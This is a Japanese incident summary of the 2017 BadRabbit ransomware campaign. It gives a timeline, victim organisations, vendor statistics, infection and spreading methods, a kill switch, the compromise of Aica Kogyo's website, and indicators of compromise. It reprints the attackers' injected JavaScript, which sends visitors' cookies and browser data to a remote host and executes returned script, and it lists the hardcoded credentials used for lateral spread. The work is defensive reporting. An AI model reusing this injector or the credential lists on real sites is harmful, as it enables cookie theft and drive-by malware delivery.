ランサムウェアBadRabbitに関する情報についてまとめてみた

2017年10月24日夜（日本時間）からウクライナやロシアを中心にランサムウェア「BadRabbit」に感染し、被害を受けたとの情報が出回っています。ここではBadRabbitに関連する情報についてまとめます。

タイムライン

日時	出来事
2016年9月8日	一連のキャンペーンに関連するとみられる通信先でRiskIQにより最初に観測された日。
2017年2月頃	FireEyeが攻撃にも利用されたJavaScript フレームワークを観測。*1
2017年10月6日	アイカ工業のサーバーが不正アクセスを受ける。
〃 17時2分	アイカ工業のWebサイトが改ざんされる。
2017年10月9日	アイカ工業のサーバーが不正アクセスを受ける。
2017年10月24日 17時頃	BadRabbitの拡散が始まる。
〃 21時26分	InterfaxがTwitterを通じてWebサイトに障害が発生していると報告。*2
〃 23時37分	この日時までアイカ工業のWebサイトがされていた。
〃 24時頃	BadRabbitの拡散を行っていたWebサイトが停止する。
〃	ウクライナのCERT-UAがさらなる攻撃の可能性があるとして注意喚起。*3
〃	US-CERTがBadRabbitによる感染報告を複数受けているとして情報公開。*4
2017年10月25日 1時	ウクライナ保安庁が同国内で確認されたインシデントに対する情報提供、及び注意喚起。*5
〃		海外のセキュリティソフト会社よりアイカ工業のWebサイトがサイバー攻撃悪用の疑いがあると情報発信。*6
〃 12時17分	アイカ工業は同社Webサイトを一時閉鎖。
2017年10月26日 8時45分	アイカ工業はWebサイトへ攻撃の疑いがあると発表。
〃 15時30分	アイカ工業はWebサイトが一時的に改ざんされた痕跡を確認と発表。
〃 17時頃	IPAがBadRabbitに対して注意喚起。*7
〃 22時20分	Cisco(Talos)がBadRabbitの拡散機能にEternalRomanceが利用されていると指摘。
2017年11月2日 19時10分	アイカ工業が続報としてWebサイトが改ざんされていた可能性がある期間を発表。
2017年11月20日 9時	アイカ工業がWebサイトを再開。最終報を発表。

被害状況

現在報道されている被害の多くはロシアを中心に、ウクライナ等の東欧地方で発生している。

BadRabbitの影響を受けたとみられる具体名が出ている組織

組織名	国	被害・影響の概要
インタファクス通信	ロシア	Webサイトなどの一部のサービスに障害発生。
フォンタンカ出版	ロシア	サーバーが攻撃を受け障害発生。*8
オデッサ国際空港	ウクライナ	職員が旅客データを手入力による対応に変更となった。これを受け当該空港を利用する数便に遅れが生じた。
キエフ地下鉄	ウクライナ	決済システムで障害が発生した。列車運行への影響はなかった。

セキュリティ組織の把握状況

セキュリティ組織	把握している被害状況
NCSC	BadRabbitの影響を受けた報告は一切受けていない。*9
IPA	多くの機関において業務に支障が出るなどの深刻な影響が発生している。
ESET	被害の半分以上はロシアで発生。観測された割合はロシア65%、ウクライナ12.2%、ブルガリア10.2%、トルコ6.4%、日本3.8%、その他2.4%
Kaspersky	KSNの統計では全体として約200の端末で攻撃を確認。大半はロシア。この他にウクライナ、トルコ、ドイツ等でも確認している。
TrendMicro	SPNの統計では日本国内での検出は確認されていない。改ざんされたサイトはデンマーク、アイルランド、トルコ、ロシアで確認。 25日17時半時点でロシア110台、カザフスタン3台、ウクライナ1台の計114台をブロックした。
Symantec	感染試行の検出の大半はロシアで最初に現れてから2時間後に発生。感染試行の国別の検出状況はロシア86%、日本3%、ブルガリア2%、ウクライナ1%、アメリカ1%、その他7%
Avast	15か国のユーザーでBadRabbitを検出それぞれの検出率はロシアが71%、ウクライナ14%、ブルガリア8%。ポーランド、US、ルーマニアなどでも検出しているが1%以下。

日本国内の状況

TBSは日本国内で2017年10月25日時点で大きな被害は確認されていないとの報道。*10
ロイター通信はESETへの取材をもとに日本国内でも被害が発生していると報道。*11
FireEyeも報道を通じ、日本国内の企業が攻撃を検知したことを明らかにしている。

ランサムウェア「BadRabbit」について

ランサムウェアであり、特定の拡張子に該当するファイルとMBRを暗号化し感染端末を使用不可にする。
脅迫として求められる金額は最初は0.05ビットコイン。
表示される時間が過ぎると身代金が増額される。
BadRabbitに存在する暗号化機能にバグが存在することをkasperskyが確認している。

感染デモ動画

BadRabbitと呼ばれる由来

Bad Rabbit TOR Payment Site. pic.twitter.com/xi8RBTgK49
— BleepingComputer (@BleepinComputer) 2017年10月24日

支払いに関する情報が掲載されたWebサイト「BadRabbit」と掲載されていたことから。
これ以外にも次の呼称が用いられる場合がある。
- Diskcoder.D（ESET)
- Win32/Tibbar.A (Microsoft)
- Trojan:W32/Rabbad (F-Secure)

感染経路(1)：改ざんされたサイトの閲覧による感染

正規の複数のニュースサイト等が改ざんされ、改ざんされたサイトへアクセスした際にドロッパーがダウンロードされる。
ドロッパーは名前やアイコンがFlash Playerのアップデートインストーラを偽装している。
感染は誤って偽装したドロッパーを実行させる手口。脆弱性は利用されておらず、改ざんされたサイトを閲覧しただけで自動的に感染することはない。

感染経路(2)：BadRabbitの拡散機能による感染

企業内ネットワークを狙ったものとみられており、ネットワーク内の拡散機能が実装されている。
拡散機能はNotPetyaで見られた手口と同様の方法がとられている。
SMB経由で他のコンピュータに拡散する。
Mimikatzツールを使用して資格情報の抽出を試行する。*12
コード内に書き込まれたID、パスワードを用いて別の端末に感染を拡大させようとする。*13
脆弱性の利用はないと当初見られていた*14が、26日頃にCisco、TrendMicroがEternalRomanceが利用されていると指摘。
MBSDは「EternalSynergy」の通信と類似していると指摘。
EternalRomanceで利用される脆弱性はMS17-010で修正されたCVE-2017-0145。
クレデンシャルの一覧は研究者により公開されている。*15
埋め込まれている４つのパスワード文字列は映画「ハッカー」の劇中でもっとも一般的なパスワードとされる文字列。

認証試行に用いられるユーザーID文字列

Administrator,Admin,Guest,User,User1,user-1Test,root,buh,boss,ftp,rdp,rdpuser,rdpadmin,manager,
support,work,other user,operator,backup,asus,ftpuser,ftpadmin,nas,nasuser,nasadmin,superuser,netguest,alex

認証試行に用いられるパスワード文字列

Administrator,administrator,Guest,guest,User,user,Admin,adminTest,test,root,123,1234,12345,123456,1234567,
12345678,123456789,1234567890,Administrator123,administrator123,Guest123,guest123,User123,user123,Admin123,
admin123Test123,test123,password,111111,55555,77777,777,qwe,qwe123,qwe321,qwer,qwert,qwerty,qwerty123,zxc,
zxc123,zxc321,zxcv,uiop,123321,321,love,secret,sex,god

BadRabbitの暗号化機能

AES-128bitで暗号化される。
AES-128bitの暗号化鍵はRSA-2048bit公開鍵により暗号化される。
暗号化されたファイルの終端に「ecrypted」と追加する。

暗号化される対象の拡張子

.3ds .7z .accdb .ai .asm .asp .aspx .avhd .back .bak .bmp .brw .c .cab .cc .cer .cfg .conf .cpp .crt .cs .ctl .cxx .dbf .der .dib .disk .djvu .doc .docx .dwg .eml .fdb .gz .h .hdd .hpp .hxx .iso .java .jfif .jpe .jpeg .jpg .js .kdbx .key .mail .mdb .msg .nrg .odc .odf .odg .odi .odm .odp .ods .odt .ora .ost .ova .ovf .p12 .p7b .p7c .pdf .pem .pfx .php .pmf .png .ppt .pptx .ps1 .pst .pvi .py .pyc .pyw .qcow .qcow2 .rar .rb .rtf .scm .sln .sql .tar .tib .tif .tiff .vb .vbox .vbs .vcb .vdi .vfd .vhd .vhdx .vmc .vmdk .vmsd .vmtm .vmx .vsdx .vsv .work .xls .xlsx .xml .xvd .zip

組み込まれたRSA-2048の公開鍵

MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB

この他に実装されている機能など

ウィルス対策ソフトの無効化が表示される*16
BadRabbitの感染プロセスとして、3つのジョブが登録、実行される。
ジョブ名に利用されている文字列からBadRabbitの関係者は「Game Of Thrones」のファンではないかとKasperskyは分析している。

ジョブ名などに登場する文字列

ジョブ名等の文字列	Game Of Thronesでの役割	ジョブの動き
rhaegal	Rhaegar Targaryen王子にちなんで名づけられた。3匹のドラゴンの1つ。	dispci.exeとdrogon.jobを実行する。
dorogon	Khal Drogoにちなんで名づけられた。3匹のドラゴンの1つ。	PCをシャットダウンし、暗号化を実行。身代金文書を表示する。
viserion (viserion_)	Night Kingが殺されワイトとして復活したドラゴン。3匹のドラゴンの1つ。	2度目の再起動時に実行。スクリーンロックし、身代金要求画面を表示。
GrayWorm	Kasperskyによれば登場人物との紹介されているが、同名の人物は存在しないとみられる。似た名前として同作に登場する司令官Grey Wormが存在する。

BadRabbitのキルスイッチ

次の2つのファイルをあらかじめ生成し、ファイルから全ての権限を削除しておくことでBadRabbitの感染プロセスが停止する。*17

c:\windows\infpub.dat
C:\Windows\cscc.dat

過去観測されたランサムウェアとの関連性分析

コメント元	対象のランサムウェア	関連の有無	見解
Group-IB	NotPetya	肯定	NotPetyaを修正したものと解析している。
ESET	Petya	肯定	Petya(Penza)の変種と解析している。
Kaspersky	NotPetya	肯定	コードの一部の一致、ドメインのリストが同一、拡散方法が類似等から背後にいる関係者は同じとの見方。
IntezerLabs	NotPetya	否定？	同社リサーチャーはコードの類似率は13%であると分析。*18
PwC	NotPetya	肯定	同社脅威アナリストはNotPetyaとBadRabbitの表層的な差異分析をした結果、両者に密接な関連がみられる*19
Bitdefender	GoldenEye/NotPetya	肯定	構造的に、そしてより広い焦点からも極めて似ている。
Cisco(Talos)	NotPetya(Nyetya)	肯定	BadRabbitとNyetyaのコアコードは同じベース上に構築されている。両マルウェアのビルドツールチェーンは非常に似ている。絶対的なつながりを示す証拠はないが両マルウェアの作成者は同じであるといった確信を持っている。
@Adam_Cyber	NotPetya	肯定	DLLを共有かつ67%が同一のコードベースである。これら攻撃は同じスレットアクターが背後にいる可能性。*20

改ざんされた恐れのあるサイト一覧にアイカ工業のドメイン名が含まれる

『ただいまメンテナンス中です』 pic.twitter.com/ujKE4QZjjH
— piyokango (@piyokango) 2017年10月25日

2017年10月26日 [PDF] 弊社ホームページに対するサイバー攻撃の疑いについて
2017年10月26日 [PDF] 弊社ホームページに対するサイバー攻撃の疑いについて【第２報】
2017年11月02日 [PDF] 弊社ホームページに対するサイバー攻撃について【第３報】
2017年11月20日 [PDF] アイカホームページ再開のお知らせ（弊社ホームページに対するサイバー攻撃について【最終報】）

経緯

Group-IBがBadRabbitに感染させるために改ざんされたとされるドメイン一覧をTwitterへ投降。
その投稿には日本のアイカ工業株式会社のドメイン「aica.co.jp」が含まれていた。
アイカ工業は海外のセキュリティ会社(Group-IBではない別の会社)より指摘を受け外部委託先、セキュリティソフト会社等と調査中。*21
アイカ工業は10月26日 12時17分にWebサイトを一時停止した。(翌月20日に再開。)
調査を通じ、特定のファイルが一時的に改ざんされ、その後元に戻されていたことが判明した。
アイカ工業は愛知県警察(サイバー犯罪対策課)に相談した。

改ざんの状況

報道によれば10月14日に改ざんされた。RiskIQの分析では12日に改ざんが確認され、少なくとも19日まで確認されている。
その後の調査により10月6日から10月24日にかけて改ざんされていた恐れがあったことがアイカ工業の続報により明らかにされた。
アイカ工業のカタログを閲覧した社員のPCが不正なサイトに接続試行した記録が確認された。*22
サーバー上での被害はコンテンツの改ざんのみ確認された(情報漏えい等それ以外の被害なし）。改ざんはランサムウェアの配布に悪用されたものとみられる。
不正アクセスを受けた原因はFWでのアクセス制御の不備、SSHにセキュリティ上の脆弱性が存在したことによる。
SSHはメンテナンス用。改ざんにはSFTPが悪用された可能性が高いとの調査結果。*23
改ざんされた間のアクセス件数は16,555件。11月20日の最終報時点でアイカ工業へ被害報告は寄せられていない。

BadRabbit関連情報（IOC情報）

ファイル

ファイル名	機能	Sha256
install_flash_player.exe FlashUtil.exe	ドロッパー	630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da
infpub.dat	dispci.exeの起動タスクを作成。 RSA暗号を利用して対象ファイルを暗号化。	579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648 141d45d650580ed4b0d0fc4b8fd5448da67b30afbe07781da02c39d345a8f4a0
dispci.exe	別のブートローダーをインストール。マシンを起動不可とする。	8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93
cscc.dat	32ビット版のDiskCryptor用ドライバ	682ADCB55FE4649F7B22505A54A9DBC454B4090FC2BB84AF7DB5B0908F3B7806
〃	64ビット版のDiskCryptor用ドライバ	0b2f863f4119dc88a22cc97c0a136c88a0127cb026751303b045f7322a8972f6
Mimikatz	32ビット版のmimikatz 亜種	2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035
〃	64ビット版のmimikatz 亜種	301b905eb98d8d6bb559c04bbda26628a942b2c4107c07a02e8f753bdcfe347c

BadRabbit関連の通信先

種別	通信先
埋め込まれていた通信先(1)	185.149.120[.]3
埋め込まれていた通信先(2)	172.97.69[.]79 (dfkiueswbgfreiwfsd[.]tk)
埋め込まれていた通信先(3)	91.236.116[.]50
埋め込まれていた通信先(4)	38.84.134[.]15
ドロッパー配布元	1dnscontrol[.]com/flash_install.php (5[.]61[.]37[.]209)
ペイメント先	caforssztxqzf2nm[.]onion
同じキャンペーンで利用の恐れがある通信先(ESET)	webcheck01[.]net webdefense1[.]net secure-check[.]host firewebmail[.]com secureinbox[.]email secure-dns1[.]net

改ざんされていた恐れのあるWebサイト

埋め込まれていた通信先(1) 185.149.120[.]3

aica[.]co[.]jp
www[.]dermavieskin[.]com
grupovo[.]bg
www[.]fitnes-trener[.]com[.]ua
www[.]afaceri-poligrafice[.]ro
grandua[.]ua
i24[.]com[.]ua
scanstockphoto[.]com
izgodni[.]bg
www[.]biotechusa[.]ru
www[.]mediaport[.]ua
www[.]armoniacenter[.]com
sweet-home[.]dn[.]ua

埋め込まれていた通信先(2) 172.97.69[.]79

www[.]chnu[.]edu[.]ua
fitnes-trener[.]com[.]ua
www[.]t[.]ks[.]ua
www[.]fastfwd[.]ru
www[.]uscc[.]ua
bitte[.]net[.]ua
www[.]fitnes-trener[.]com[.]ua
ophthalmolog[.]kiev[.]ua
grandua[.]ua
i24[.]com[.]ua
akvadom[.]kiev[.]ua
ulianarudich[.]com[.]ua
football[.]zp[.]ua
www[.]mediaport[.]ua
chnu[.]edu[.]ua
evroremont[.]kharkov[.]ua
thecovershop[.]pl
www[.]tofisa[.]com
cream-dream[.]com[.]ua
go2odessa[.]ru
bahmut[.]com[.]ua

埋め込まれていた通信先(3) 91.236.116[.]50

abantyoreselurunler[.]com
aldingareefretreat[.]com
ftp9[.]net
magicofis[.]com
piiz[.]tk
tedizmir[.]k12[.]tr
websgramly[.]com
www[.]andronova[.]net
www[.]detaymaxinet[.]com
www[.]fikracenneti[.]com
www[.]gulenturizm[.]com[.]tr
www[.]ilgihastanesi[.]com
www[.]komedibahane[.]com
www[.]moonlightcinemaclub[.]com
www[.]musterihizmetlerinumarasi[.]com
www[.]techkafa[.]net
www[.]teknolojihaber[.]net
www[.]vertizontal[.]ro

埋め込まれていた通信先(4) 38.84.134[.]15

izgodni[.]bg
montenegro-today[.]com
scanstockphoto[.]com
www[.]grupovo[.]bg
www[.]matasedita[.]sk
www[.]montenegro-today[.]com
www[.]myk104[.]com
www[.]nadupanyfanusik[.]sk
www[.]otbrana[.]com
www[.]sinematurk[.]com
www[.]ucarsoft[.]com

ペイメント先 Bitcoin ウォレット（公開されているもの）

キャンペーンに利用されたJavaScript

IPアドレス、ブラウザ、参照元サイトの情報等を収集する機能がある。
RiskIQの記事中に当該JavaScriptが掲載されている。

var REMOTE_URL = ‘<INJECTION HOST URL>’;
var C_TIMEOUT = 20000;
function analyze_traffic() {
   return {
       ‘Tr.Referer’: document.referrer,
       ‘Tr.Agent’: navigator.userAgent,
       ‘Tr.CookieState’: !!document.cookie,
       ‘Tr.Cookie’: document.cookie,
       ‘Tr.Domen’: window.location.hostname
   };
}

function execute_request(post, url, callback) {
   var xhr = init_xhr();
   if (!!xhr) {
       xhr.open(‘POST’, url);
       xhr.timeout = C_TIMEOUT;
       xhr.setRequestHeader(‘Content-Type’, ‘application/x-www-form-urlencoded’);
       xhr.onreadystatechange = function () {
           if (xhr.readyState == 4 && xhr.status == 200) {
               callback(xhr.responseText);
           }
       };
       var content = build_query(post);
       xhr.send(content);
   }
}

function apply_payload(response) {
   if (response) {
       var json_result = JSON.parse(response);
       if (json_result) {
           var inject_string = urldecode(json_result.InjectionString);
           if (json_result.InjectionType === 1) {
               window.location = inject_string;
           } else {
               write_on_page(inject_string);
           }
       }
   }
}

function write_on_page(content) {
   var div = document.createElement(‘div’);
   div.id = ‘response’;
   div.innerHTML = content;
   document.body.appendChild(div);
   var scripts = div.getElementsByTagName(‘script’);
   if (scripts.length > 0) {
       for (var i = 0; i < scripts.length; i++) {
           var script = document.createElement(‘script’);
           script.innerHTML = scripts[i].innerHTML;
           document.body.appendChild(script);
           scripts[i].parentNode.removeChild(scripts[i]);
       }
   }
}

function build_query(post) {
   var post_query = [];
   for (var k in post) {
       if (post.hasOwnProperty(k)) {
           post_query.push(k + ‘=’ + post[k]);
       }
   }
   return post_query.join(‘&’);
}

function init_xhr() {
   if (!!window.XMLHttpRequest) {
       return new XMLHttpRequest();
   } else if (!!window.ActiveXObject) {
       var xhr_array = [
           ‘Msxml2.XMLHTTP.6.0’,
           ‘Msxml2.XMLHTTP.3.0’,
           ‘Msxml2.XMLHTTP’,
           ‘Microsoft.XMLHTTP’
       ];
       for (var i = 0; i < xhr_array.length; i++) {
           try {
               return new ActiveXObject(xhr_array[i]);
           }
           catch (e) {
           }
       }
   }
}

function urldecode(data) {
   return decodeURIComponent(data).replace(/\+/g, ‘%20’);
}

// Execute request
var traffic = analyze_traffic();
execute_request(traffic, REMOTE_URL, apply_payload);

参考情報（報道、解析、まとめ等）

全国紙・ブロック紙

報道日付	新聞社	記事名
2017年10月25日朝刊	日本経済新聞	地下鉄や空港にサイバー攻撃
2017年10月25日夕刊	毎日新聞	大規模サイバー攻撃身代金ウイルス日露欧に被害 (共同)
2017年10月25日夕刊	東京新聞	ロシアや日本などに大規模サイバー攻撃身代金ウイルス感染 (共同)
2017年10月26日朝刊	産経新聞	日本や露にサイバー攻撃ウクライナ空港・地下鉄被害